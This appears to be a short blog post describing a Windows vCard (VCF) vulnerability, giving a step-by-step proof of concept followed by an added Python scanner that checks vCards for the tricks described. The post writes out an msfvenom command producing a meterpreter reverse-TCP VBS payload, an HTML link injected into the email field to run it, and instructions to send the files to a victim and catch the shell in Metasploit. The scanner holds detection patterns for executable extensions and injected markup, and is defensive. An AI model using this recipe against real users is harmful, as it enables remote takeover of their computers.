Saturday 2 February 2019

Exploiting Windows using malicious VCF file

John Page, a cyber security researcher, disclosed this vulnerability, which was a 0-day exploit that worked on the latest Windows 10 too.

Introduction: He discovered that if we replace the website in a VCF file with the local path of a ".cpl" file, Windows tends to execute that file instead of opening it in the browser. This is done by replacing "http://" with "http.\\". Alternatively, we can inject some HTML into the email field to do the same, and when the user clicks on it we get a shell. (This exploit requires human interaction.)

Proof Of Concept:


1.   We need to create a simple payload. (I used msfvenom and selected "vbs" as the format.)
       msfvenom -p windows/meterpreter/reverse_tcp lhost=<IP> lport=<lport> -f vbs > <file_name>.vbs

2.   Inject HTML into the email field, with the href value set to the payload file name (both files must be in the same folder), and save the file.
      <a href="shell.vbs">alokkumar@gmail.com</a>


3.   Now we have to send this folder to the victim.



4.   Set up multi/handler with the proper options in Metasploit and wait for the victim to click on the link.


5.   When the user clicks on the link, we get a shell.


This exploit needs user interaction although it's a 0-day. Post your comments below. Thanks for reading.
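
A defensive check for the two tricks described above, as an added example that is not part of the original post: it scans the URL and EMAIL fields of a vCard for a value that is not a plain http(s) address, for HTML markup, and for references to executable file types. The sample vCards, the function names and the extension list beyond .cpl and .vbs are assumptions made for illustration.

```python
import re

# Constructed sample vCards for illustration (not taken from the original post).
BENIGN_VCF = r"""BEGIN:VCARD
VERSION:2.1
FN:Example User
EMAIL;PREF;INTERNET:user@example.com
URL;WORK:http://www.example.com
END:VCARD
"""

SUSPICIOUS_VCF = r"""BEGIN:VCARD
VERSION:2.1
FN:Example User
EMAIL;PREF;INTERNET:<a href="shell.vbs">user@example.com</a>
URL;WORK:http.\\folder\sample.cpl
END:VCARD
"""

# Assumed extension list; the post itself only names .cpl and .vbs.
EXEC_EXT = re.compile(r"\.(cpl|vbs|exe|hta|js|bat|scr)\b", re.I)
HTML_TAG = re.compile(r"<\s*a\b|href\s*=", re.I)
WEB_URL = re.compile(r"^https?://[^\\\s]+$", re.I)

def unfold(text):
    """Join vCard continuation lines (those starting with space or tab)."""
    return re.sub(r"\r?\n[ \t]", "", text).splitlines()

def scan_vcf(text):
    """Return a list of (property, reason) findings for one vCard file."""
    findings = []
    for line in unfold(text):
        name, sep, value = line.partition(":")
        if not sep:
            continue
        prop = name.split(";")[0].upper()  # drop parameters such as ;WORK
        value = value.strip()
        if prop == "URL" and not WEB_URL.match(value):
            findings.append((prop, "URL is not a plain http(s):// address"))
        if prop == "EMAIL" and HTML_TAG.search(value):
            findings.append((prop, "HTML markup in e-mail field"))
        if prop in ("URL", "EMAIL") and EXEC_EXT.search(value):
            findings.append((prop, "references an executable file type"))
    return findings
```

Run over an attachment before it reaches a user, any non-empty result is a reason to quarantine the contact file and the folder it arrived in.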

